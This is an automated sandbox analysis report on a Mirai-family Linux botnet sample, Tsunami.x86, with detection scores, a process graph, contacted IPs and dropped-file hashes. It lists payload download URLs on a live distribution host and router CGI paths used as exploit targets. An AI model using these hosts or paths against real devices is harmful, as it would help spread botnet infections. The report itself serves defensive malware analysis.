    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 512552 Sample: Tsunami.x86 Startdate: 01/11/2021 Architecture: LINUX Score: 88 88 94.60.211.161 VODAFONE-PTVodafonePortugalPT Portugal 2->88 90 41.8.13.47 VODACOM-ZA South Africa 2->90 92 98 other IPs or domains 2->92 100 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->100 102 Multi AV Scanner detection for submitted file 2->102 104 Yara detected Mirai 2->104 106 3 other signatures 2->106 10 gdm3 gdm-session-worker 2->10         started        12 gdm3 gdm-session-worker 2->12         started        14 gdm3 gdm-session-worker 2->14         started        16 43 other processes 2->16 signatures3 process4 signatures5 19 gdm-session-worker gdm-x-session 10->19         started        21 gdm-session-worker gdm-x-session 12->21         started        23 gdm-session-worker gdm-x-session 14->23         started        94 Reads system files that contain records of logged in users 16->94 25 Tsunami.x86 16->25         started        27 accounts-daemon language-validate 16->27         started        29 accounts-daemon language-validate 16->29         started        31 7 other processes 16->31 process6 process7 33 gdm-x-session dbus-daemon 19->33         started        36 gdm-x-session Xorg Xorg.wrap Xorg 19->36         started        38 gdm-x-session dbus-daemon 21->38         started        40 gdm-x-session Xorg Xorg.wrap Xorg 21->40         started        46 2 other processes 23->46 48 8 other processes 25->48 42 language-validate language-options 27->42         started        44 language-validate language-options 29->44         started        50 5 other processes 31->50 signatures8 96 Sample reads /proc/mounts (often used for finding a writable filesystem) 33->96 52 dbus-daemon 33->52         started        54 Xorg sh 36->54         started        56 dbus-daemon 38->56         started        58 Xorg sh 40->58         started        60 language-options sh 42->60         started        62 language-options sh 44->62         started        68 2 other processes 46->68 98 Sample tries to kill many processes (SIGKILL) 48->98 64 language-options sh 50->64         started        66 language-options sh 50->66         started        process9 process10 70 dbus-daemon false 52->70         started        72 sh xkbcomp 54->72         started        74 dbus-daemon false 56->74         started        76 sh xkbcomp 58->76         started        78 2 other processes 60->78 80 2 other processes 62->80 82 2 other processes 64->82 84 2 other processes 66->84 86 2 other processes 68->86

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Tsunami.x8633%VirustotalBrowse
    Tsunami.x8633%ReversingLabsLinux.Trojan.Mirai

    Dropped Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://127.0.0.1:80/tmUnblock.cgi0%VirustotalBrowse
    http://127.0.0.1:80/tmUnblock.cgi0%Avira URL Cloudsafe
    http://23.94.37.59/bin0%Avira URL Cloudsafe
    http://23.94.37.59/bins/Tsunami.mips;0%Avira URL Cloudsafe
    http://23.94.37.59/bins/Tsunami.x8612%VirustotalBrowse
    http://23.94.37.59/bins/Tsunami.x860%Avira URL Cloudsafe
    http://23.94.37.59/zyxel.sh;0%Avira URL Cloudsafe
    http://192.168.0.14:80/cgi-bin/ViewLog.asp0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://127.0.0.1:80/tmUnblock.cgitrue
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://192.168.0.14:80/cgi-bin/ViewLog.aspfalse
    • Avira URL Cloud: safe
    		unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/soap/encoding//%22%3ETsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
      		high
      http://schemas.xmlsoap.org/soap/encoding/Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
        		high
        http://wiki.x.orgXorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.drfalse
          		high
          http://schemas.xmlsoap.org/soap/envelope/Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
            		high
            http://23.94.37.59/binTsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://upx.sf.netTsunami.x86false
              		high
              http://23.94.37.59/bins/Tsunami.mips;Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://23.94.37.59/bins/Tsunami.x86Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmptrue
              • 12%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/soap/envelope//Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
                		high
                http://www.ubuntu.com/support)Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.drfalse
                  		high
                  http://23.94.37.59/zyxel.sh;Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  5.251.149.212
                  		unknownKazakhstan
                  		9198KAZTELECOM-ASKZfalse
                  31.220.220.232
                  		unknownUnited Kingdom
                  		42689GLIDEGBfalse
                  94.54.78.106
                  		unknownTurkey
                  		47524TURKSAT-ASTRfalse
                  94.128.103.24
                  		unknownKuwait
                  		47589KTC3GKWfalse
                  94.154.174.107
                  		unknownGermany
                  		10753LVLT-10753USfalse
                  41.169.50.120
                  		unknownSouth Africa
                  		36937Neotel-ASZAfalse
                  41.8.13.47
                  		unknownSouth Africa
                  		29975VODACOM-ZAfalse
                  41.102.161.69
                  		unknownAlgeria
                  		36947ALGTEL-ASDZfalse
                  98.102.147.236
                  		unknownUnited States
                  		10796TWC-10796-MIDWESTUSfalse
                  98.131.204.227
                  		unknownUnited States
                  		46606UNIFIEDLAYER-AS-1USfalse
                  79.24.218.190
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  98.72.203.127
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  95.94.164.61
                  		unknownPortugal
                  		2860NOS_COMUNICACOESPTfalse
                  85.97.99.160
                  		unknownTurkey
                  		9121TTNETTRfalse
                  172.227.134.123
                  		unknownUnited States
                  		20940AKAMAI-ASN1EUfalse
                  95.94.164.44
                  		unknownPortugal
                  		2860NOS_COMUNICACOESPTfalse
                  85.128.224.43
                  		unknownPoland
                  		15967NAZWAPLfalse
                  98.187.110.140
                  		unknownUnited States
                  		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                  95.183.142.107
                  		unknownTurkey
                  		8517ULAKNETTRfalse
                  109.207.189.122
                  		unknownRussian Federation
                  		47438PSKOVLINE-ASRUfalse
                  98.15.44.70
                  		unknownUnited States
                  		12271TWC-12271-NYCUSfalse
                  197.143.201.43
                  		unknownAlgeria
                  		36891ICOSNET-ASDZfalse
                  98.46.251.30
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  157.2.30.58
                  		unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  95.141.197.174
                  		unknownRussian Federation
                  		44158ALTURA-ASRUfalse
                  94.37.176.233
                  		unknownItaly
                  		8612TISCALI-ITfalse
                  157.242.55.146
                  		unknownUnited States
                  		25789LMUUSfalse
                  184.195.61.175
                  		unknownUnited States
                  		10507SPCSUSfalse
                  172.126.245.224
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  94.122.78.47
                  		unknownTurkey
                  		12978DOGAN-ONLINETRfalse
                  41.206.191.250
                  		unknownSouth Africa
                  		6453AS6453USfalse
                  94.70.69.71
                  		unknownGreece
                  		6799OTENET-GRAthens-GreeceGRfalse
                  172.182.199.15
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  172.68.102.161
                  		unknownUnited States
                  		13335CLOUDFLARENETUSfalse
                  197.51.4.224
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  98.117.62.40
                  		unknownUnited States
                  		701UUNETUSfalse
                  172.99.210.159
                  		unknownReserved
                  		395799SVBUSfalse
                  41.102.161.89
                  		unknownAlgeria
                  		36947ALGTEL-ASDZfalse
                  62.52.13.79
                  		unknownGermany
                  		6805TDDE-ASN1DEfalse
                  95.20.61.41
                  		unknownSpain
                  		12479UNI2-ASESfalse
                  94.35.200.87
                  		unknownItaly
                  		8612TISCALI-ITfalse
                  88.43.235.155
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  98.72.203.146
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  157.162.143.22
                  		unknownGermany
                  		22192SSHENETUSfalse
                  95.170.75.147
                  		unknownNetherlands
                  		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                  157.220.202.140
                  		unknownUnited States
                  		4704SANNETRakutenMobileIncJPfalse
                  98.48.231.124
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  157.21.250.133
                  		unknownUnited States
                  		53446EVMSUSfalse
                  157.120.163.204
                  		unknownSingapore
                  		59349GMO-Z-COMGMO-ZCOMPTELTDSGfalse
                  85.108.147.95
                  		unknownTurkey
                  		9121TTNETTRfalse
                  98.198.78.52
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  157.33.247.171
                  		unknownIndia
                  		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  95.239.15.30
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  62.69.168.213
                  		unknownFinland
                  		59766ASWICITYITfalse
                  41.85.32.164
                  		unknownSouth Africa
                  		22355FROGFOOTZAfalse
                  62.86.66.102
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  95.183.142.128
                  		unknownTurkey
                  		8517ULAKNETTRfalse
                  98.101.210.184
                  		unknownUnited States
                  		11426TWC-11426-CAROLINASUSfalse
                  98.4.62.253
                  		unknownUnited States
                  		11351TWC-11351-NORTHEASTUSfalse
                  62.108.98.137
                  		unknownSerbia
                  		6700BEOTEL-AShttpwwwbeotelnetRSfalse
                  41.216.23.2
                  		unknownunknown
                  		36974AFNET-ASCIfalse
                  31.121.22.174
                  		unknownUnited Kingdom
                  		2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                  184.223.137.41
                  		unknownUnited States
                  		10507SPCSUSfalse
                  62.195.46.182
                  		unknownNetherlands
                  		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                  41.216.159.7
                  		unknownBurkina Faso
                  		37073IPP-burkina-asBFfalse
                  94.175.48.242
                  		unknownUnited Kingdom
                  		5089NTLGBfalse
                  197.0.175.9
                  		unknownTunisia
                  		37705TOPNETTNfalse
                  172.222.74.220
                  		unknownUnited States
                  		20115CHARTER-20115USfalse
                  94.30.214.5
                  		unknownLatvia
                  		20910BALTKOM-ASLVfalse
                  184.38.13.73
                  		unknownUnited States
                  		5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
                  157.187.216.154
                  		unknownUnited States
                  		668DNIC-AS-00668USfalse
                  31.34.241.17
                  		unknownFrance
                  		5410BOUYGTEL-ISPFRfalse
                  41.8.13.86
                  		unknownSouth Africa
                  		29975VODACOM-ZAfalse
                  172.50.129.160
                  		unknownUnited States
                  		21928T-MOBILE-AS21928USfalse
                  197.91.228.133
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  197.38.240.101
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  98.199.107.150
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  95.252.144.217
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  31.136.150.75
                  		unknownNetherlands
                  		15480VFNL-ASVodafoneNLAutonomousSystemNLfalse
                  98.117.62.66
                  		unknownUnited States
                  		701UUNETUSfalse
                  94.60.211.161
                  		unknownPortugal
                  		12353VODAFONE-PTVodafonePortugalPTfalse
                  31.143.175.39
                  		unknownTurkey
                  		16135TURKCELL-ASTurkcellASTRfalse
                  31.59.81.141
                  		unknownIran (ISLAMIC Republic Of)
                  		31549RASANAIRfalse
                  184.181.236.222
                  		unknownUnited States
                  		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                  98.65.114.253
                  		unknownUnited States
                  		11351TWC-11351-NORTHEASTUSfalse
                  197.149.52.132
                  		unknownMadagascar
                  		37054Telecom-MalagasyMGfalse
                  85.30.134.204
                  		unknownSweden
                  		34244TELESERVICESEfalse
                  94.154.174.133
                  		unknownGermany
                  		10753LVLT-10753USfalse
                  197.173.155.16
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  31.115.246.44
                  		unknownUnited Kingdom
                  		12576EELtdGBfalse
                  98.163.162.235
                  		unknownUnited States
                  		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                  31.69.207.235
                  		unknownUnited Kingdom
                  		12576EELtdGBfalse
                  197.16.42.172
                  		unknownTunisia
                  		37693TUNISIANATNfalse
                  85.158.231.111
                  		unknownAustria
                  		8692BRZATfalse
                  98.250.136.55
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  95.210.240.229
                  		unknownItaly
                  		29286SKYLOGIC-ASITfalse
                  85.158.231.114
                  		unknownAustria
                  		8692BRZATfalse
                  157.21.237.99
                  		unknownUnited States
                  		53446EVMSUSfalse
                  98.60.86.37
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  85.193.76.41
                  		unknownRussian Federation
                  		209231CCNLfalse


                  Runtime Messages

                  Command:/tmp/Tsunami.x86
                  Exit Code:0
                  Exit Code Info:
                  Killed:False
                  Standard Output:
                  kebabware installed
                  Standard Error:

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  95.94.164.44dcMqJ2tQNWGet hashmaliciousBrowse
                    85.128.224.4332UX3eB2m0Get hashmaliciousBrowse
                      31.220.220.2328FumSfvXxcGet hashmaliciousBrowse
                        94.154.174.107dqnskKAmQqGet hashmaliciousBrowse
                          184.195.61.175I02N89IxJvGet hashmaliciousBrowse

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            TURKSAT-ASTR9QPGr9LMaqGet hashmaliciousBrowse
                            • 94.54.78.128
                            apep.arm7Get hashmaliciousBrowse
                            • 94.55.137.210
                            jMJ8Uz4MhkGet hashmaliciousBrowse
                            • 46.197.223.52
                            rQ04dnvZouGet hashmaliciousBrowse
                            • 94.55.185.113
                            UnHAnaAW.x86Get hashmaliciousBrowse
                            • 94.55.185.147
                            hoho.armGet hashmaliciousBrowse
                            • 46.196.22.176
                            XO2FhWR1TzGet hashmaliciousBrowse
                            • 94.55.185.155
                            ot0uxrCL6qGet hashmaliciousBrowse
                            • 94.54.78.102
                            z0x3n.x86Get hashmaliciousBrowse
                            • 46.196.22.114
                            arm-20211007-1206Get hashmaliciousBrowse
                            • 46.196.22.153
                            5V5oGkJhwWGet hashmaliciousBrowse
                            • 94.54.78.120
                            b3astmode.x86Get hashmaliciousBrowse
                            • 46.197.211.81
                            u3zwSREEQPGet hashmaliciousBrowse
                            • 94.54.78.103
                            rpEL8cL9KSGet hashmaliciousBrowse
                            • 176.240.195.148
                            bfHSvjklSWGet hashmaliciousBrowse
                            • 176.240.78.233
                            n27hXkApmBGet hashmaliciousBrowse
                            • 94.54.78.126
                            0TOEtGJHN8.exeGet hashmaliciousBrowse
                            • 24.133.106.23
                            0TOEtGJHN8.exeGet hashmaliciousBrowse
                            • 24.133.106.23
                            7k6FKvDl0xGet hashmaliciousBrowse
                            • 46.197.5.24
                            bhtAUx6SwQGet hashmaliciousBrowse
                            • 46.196.194.109
                            KAZTELECOM-ASKZ9QPGr9LMaqGet hashmaliciousBrowse
                            • 95.56.23.109
                            32UX3eB2m0Get hashmaliciousBrowse
                            • 95.57.49.132
                            9Zwx7jGcZZ.exeGet hashmaliciousBrowse
                            • 2.133.130.23
                            wRmHCEnowIGet hashmaliciousBrowse
                            • 5.251.61.151
                            5BfhgIXvAyGet hashmaliciousBrowse
                            • 178.89.180.0
                            HCyigyiCAHGet hashmaliciousBrowse
                            • 37.151.211.126
                            SecuriteInfo.com.Linux.Mirai.1429.15365.3177Get hashmaliciousBrowse
                            • 178.91.19.41
                            T4xP1S9FhzGet hashmaliciousBrowse
                            • 178.91.19.45
                            g22kPe2LIcGet hashmaliciousBrowse
                            • 178.91.19.60
                            hWT9RJDotDGet hashmaliciousBrowse
                            • 37.151.211.145
                            buiodawbdawbuiopdw.arm7Get hashmaliciousBrowse
                            • 178.91.19.39
                            4XWuRHcU7SGet hashmaliciousBrowse
                            • 95.56.23.145
                            ATc5uxXlTpGet hashmaliciousBrowse
                            • 82.200.172.218
                            YLUHj9C3idGet hashmaliciousBrowse
                            • 95.57.49.124
                            whaxbkJxneGet hashmaliciousBrowse
                            • 5.251.13.242
                            sh1i15951IGet hashmaliciousBrowse
                            • 95.57.49.133
                            J1Scd1bnC4Get hashmaliciousBrowse
                            • 95.56.220.165
                            WZ4DVF29PbGet hashmaliciousBrowse
                            • 178.91.19.54
                            Ecxh4Ab1RZGet hashmaliciousBrowse
                            • 178.91.19.66
                            qF7g4nnHh0Get hashmaliciousBrowse
                            • 178.91.19.50
                            GLIDEGBapep.x86Get hashmaliciousBrowse
                            • 31.220.220.250
                            yqYt9HH2OYGet hashmaliciousBrowse
                            • 5.151.114.87
                            L7PID7HuZyGet hashmaliciousBrowse
                            • 5.151.151.35
                            tmDSSwkOAMGet hashmaliciousBrowse
                            • 31.220.220.236
                            Tsunami.x86Get hashmaliciousBrowse
                            • 31.220.220.217
                            ut5yFyWEDdGet hashmaliciousBrowse
                            • 31.220.220.207
                            index_2021-09-30-12_54Get hashmaliciousBrowse
                            • 5.151.138.69
                            8UoSNa8TSmGet hashmaliciousBrowse
                            • 130.43.171.48
                            S7wQtTgZBFGet hashmaliciousBrowse
                            • 130.43.171.58
                            FGLqhK6ZvkGet hashmaliciousBrowse
                            • 5.151.203.211
                            mA7WUZVyyPGet hashmaliciousBrowse
                            • 5.151.151.67
                            8FumSfvXxcGet hashmaliciousBrowse
                            • 31.220.220.232
                            hOP4NVXWMKGet hashmaliciousBrowse
                            • 31.220.220.241
                            b48zuunBwhGet hashmaliciousBrowse
                            • 31.220.220.215
                            arm7Get hashmaliciousBrowse
                            • 130.43.146.86
                            3bkNBQMcpcGet hashmaliciousBrowse
                            • 5.151.151.45
                            WQB6HkuyxCGet hashmaliciousBrowse
                            • 31.220.220.201
                            P29XswTID1Get hashmaliciousBrowse
                            • 5.151.151.39
                            6K8zK2czTnGet hashmaliciousBrowse
                            • 31.220.220.246
                            EtNIxD2GSDGet hashmaliciousBrowse
                            • 31.220.220.236

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink
                            Process:/usr/bin/pulseaudio
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.9219280948873623
                            Encrypted:false
                            SSDEEP:3:5bkPn:pkP
                            MD5:FF001A15CE15CF062A3704CEA2991B5F
                            SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                            SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                            SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: auto_null.
                            /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source
                            Process:/usr/bin/pulseaudio
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):18
                            Entropy (8bit):3.4613201402110088
                            Encrypted:false
                            SSDEEP:3:5bkrIZsXvn:pkckv
                            MD5:28FE6435F34B3367707BB1C5D5F6B430
                            SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                            SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                            SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: auto_null.monitor.
                            /memfd:30-systemd-environment-d-generator (deleted)
                            Process:/usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):200
                            Entropy (8bit):4.621490641385995
                            Encrypted:false
                            SSDEEP:3:+2snsY7+4VMPQnMLmPQ9JEcn8YLw6mNErZwb906izhs32Y0f/KiDXK/vi++BLiVv:Ess+4m4Mixc8Y06me6osMjDXj++yvn
                            MD5:5EF9649F7C218F464C253BDC1549C046
                            SHA1:07C3B1103F09E5FB0B4701E75E326D55D4FC570B
                            SHA-256:B4480A805024063034CB27A4A70BCA625C46C98963A39FE18F9BE2C499F1DA40
                            SHA-512:DF620669CD92538F00FEB397BA8BB0C0DC9E242BA2A3F25561DE20AE59B73AC54A15DBFBD4C43F8006FA09D0A07D9EC5DD5D395AD4746E022A17E78274DEB83B
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: QT_ACCESSIBILITY=1.PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin.XDG_DATA_DIRS=/usr/local/share/:/usr/share/:/var/lib/snapd/desktop.
                            /memfd:user-environment-generators (deleted)
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):212
                            Entropy (8bit):4.657790370557215
                            Encrypted:false
                            SSDEEP:6:ulsT4m4Mixc8Y06me6kLT0QsMjDXj++yvn:XT5ikXT05OLj+Hvn
                            MD5:769AC00395ABDA061DA4777C87620B21
                            SHA1:AC12A8E0EB413395C64577FA7E514626B8F8F548
                            SHA-256:75867CD2977A9A9AAB70E70CFEE3C20151F31C9B3CBDA4A81C06627C291D2C82
                            SHA-512:67C2B17CDD15B7F69BE2DF4F3136E3F393C1C6F990755DFEEC1B0B4E1081A15132A8D77A1624CAD1F6255591AE54CB9135F1B94FE31D5876E2A17B215CDB78F3
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: env=QT_ACCESSIBILITY=1.env=PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin.env=XDG_DATA_DIRS=/usr/local/share/:/usr/share/:/var/lib/snapd/desktop.
                            /proc/5272/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: -1000.
                            /proc/5798/oom_score_adj
                            Process:/usr/bin/dbus-daemon
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:V:V
                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: 0
                            /proc/5855/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: -1000.
                            /proc/6286/oom_score_adj
                            Process:/usr/bin/dbus-daemon
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:V:V
                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                            Malicious:false
                            Preview: 0
                            /proc/6312/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Preview: -1000.
                            /proc/6992/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Preview: -1000.
                            /proc/7407/oom_score_adj
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):6
                            Entropy (8bit):1.7924812503605778
                            Encrypted:false
                            SSDEEP:3:ptn:Dn
                            MD5:CBF282CC55ED0792C33D10003D1F760A
                            SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                            SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                            SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                            Malicious:false
                            Preview: -1000.
                            /proc/7543/oom_score_adj
                            Process:/usr/bin/dbus-daemon
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:V:V
                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                            Malicious:false
                            Preview: 0
                            /run/sshd.pid
                            Process:/usr/sbin/sshd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            SSDEEP:3:iVc:ii
                            MD5:79AEA331F06F8D90C1BA542F0A64A8DE
                            SHA1:741023052EA87CB24C9888963F486149C797D128
                            SHA-256:472F04A8C2A04E16F81098265E237C89424B908C807F4E6BB5D994D27C527E59
                            SHA-512:862CC56DF0C363EEDE57AD5E5E4ADABEF411E571AA2EFE52997121DEF4DA8E6C11A99D76A62E45E58E96AA543BF5E9FEC5C7493DE523286844A7F8ECAE510669
                            Malicious:false
                            Preview: 7407.
                            /run/systemd/inhibit/.#10NlkwDx
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):249
                            Entropy (8bit):5.1334532270294
                            Encrypted:false
                            SSDEEP:6:SbFuFyL8NEL1QXccIRI/cIlG/cI/0tmWvyPXaLX6zpp7Rl:qgFqXQXTI1IltIQvEy0Rl
                            MD5:AF66846AF74C40610BAFB25EE938E4A4
                            SHA1:FE0B6DDD55722B8EF394C736B3868CFF6744AADB
                            SHA-256:BD8502E132D917AEBA0DBEC8BC8A7577225E2292D5DFCA93E7BF8E9676749D7E
                            SHA-512:382125456440D04D4C16AEAF60066659FEFC4F14AF76A215901DD2AC13E1C24FB37F0C13BA9BD5CE7D32633544658FB855834084CC69576FEEEBF96BBB7D9EDD
                            Malicious:false
